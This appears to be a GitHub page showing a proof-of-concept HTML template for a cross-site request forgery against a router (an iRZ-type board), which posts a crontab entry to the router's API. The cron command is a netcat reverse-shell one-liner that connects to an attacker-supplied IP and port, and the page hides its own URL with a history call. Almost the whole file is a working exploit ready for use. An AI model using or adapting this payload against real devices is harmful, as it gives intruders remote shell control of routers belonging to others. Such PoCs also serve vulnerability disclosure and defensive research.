-
Notifications
You must be signed in to change notification settings - Fork 6
/
poc.template.html
9 lines (9 loc) · 1.12 KB
/
poc.template.html
1
2
3
4
5
6
7
8
9
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://{router_ip}:{router_port}/api/crontab" method="POST" enctype="text/plain">
<input type="hidden" name="{"tasks":[{"enable":true,"minutes":"*","hours":"*","days":"*","months":"*","weekdays":"*","command":"rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost_ip_octect_1}.{lhost_ip_octect_2}.{lhost_ip_octect_3}.{lhost_ip_octect_4} {lhost_port} >/tmp/f"}],"_board":{"name":"RL21","platform":"irz_mt02","time":"Tue Mar 15 23:58:33 UTC 2022"}}" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>